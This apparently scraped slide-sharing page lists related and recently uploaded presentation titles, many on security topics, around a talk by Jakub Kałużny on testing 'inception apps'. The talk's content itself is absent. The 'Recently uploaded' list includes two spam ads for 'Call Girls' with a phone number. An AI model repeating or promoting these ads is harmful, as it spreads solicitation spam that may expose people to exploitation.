Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
 
JLeRN_CETIS2012
JLeRN_CETIS2012JLeRN_CETIS2012
JLeRN_CETIS2012
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 

Similar to "We need to go deeper - testing inception apps" - Jakub Kałużny

Smit WiFi_2
Smit WiFi_2Smit WiFi_2
Smit WiFi_2
mutew
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
CODE BLUE
 
SCADA StrangeLove 2: We already know
SCADA StrangeLove 2: We already knowSCADA StrangeLove 2: We already know
SCADA StrangeLove 2: We already know
qqlan
 
Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?
Charles Givre
 
Yahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupYahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user group
Hadoop User Group
 

Similar to "We need to go deeper - testing inception apps" - Jakub Kałużny (20)

Smit WiFi_2
Smit WiFi_2Smit WiFi_2
Smit WiFi_2
 
How to use shodan more powerful
How to use shodan more powerful How to use shodan more powerful
How to use shodan more powerful
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 
Kong API Gateway
Kong API Gateway Kong API Gateway
Kong API Gateway
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
 
Security Testing by Ken De Souza
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De Souza
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
The Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect DataThe Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect Data
 
Creating Responsive Experiences
Creating Responsive ExperiencesCreating Responsive Experiences
Creating Responsive Experiences
 
Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"
 
SCADA StrangeLove 2: We already know
SCADA StrangeLove 2: We already knowSCADA StrangeLove 2: We already know
SCADA StrangeLove 2: We already know
 
Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
Performance Risk Management
Performance Risk ManagementPerformance Risk Management
Performance Risk Management
 
Evolveum: IDM story for a growing company
Evolveum: IDM story for a growing companyEvolveum: IDM story for a growing company
Evolveum: IDM story for a growing company
 
Bulletproof
BulletproofBulletproof
Bulletproof
 
Mobile security
Mobile securityMobile security
Mobile security
 
Yahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupYahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user group
 

Recently uploaded

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 

Recently uploaded (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 

"We need to go deeper - testing inception apps" - Jakub Kałużny